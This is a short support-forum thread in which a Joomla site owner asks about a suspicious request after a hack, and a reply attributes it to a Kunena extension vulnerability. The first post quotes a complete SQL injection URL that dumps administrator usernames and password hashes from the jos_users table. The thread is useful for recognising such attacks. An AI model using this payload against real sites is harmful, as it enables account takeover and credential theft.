Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!

TOPIC: someone is trying to login with this line.

someone is trying to login with this line. 10 years 6 months ago #25112

My site got hacked and I think I cleaned it up but someone is trying to login with this. Does this mean they have some code embedded they are accessing?

http://(mysite)/index.php?option=com_kunena&func=userlist&search="%' and 1=2) union select 1, concat(username,0x3a,password,0x3a,usertype),concat(username,0x3a,password,0x3a,usertype),'Super Administrator','email','2000-11-26 22:09:28','2013-11-26 22:09:28',62,1,1,0,0,0,1,15 from jos_users where usertype='Super Administrator'-- ;";
The administrator has disabled public write access.

someone is trying to login with this line. 10 years 4 months ago #25783

Somebody tries to hack your site by using a vulnerable security problem of the Kunena Extention.
If Kunena is not installed, you are safe.
The administrator has disabled public write access.

Read this first!

We do not monitor these forums. The forum is provided to exchange information and experience with other users ONLY. Forum responses are not guaranteed.

However, please submit a ticket if you have an active subscription and wish to receive support. Our ticketing system is the only way of getting in touch with RSJoomla! and receiving the official RSJoomla! Customer Support.

For more information, the Support Policy is located here.

Thank you!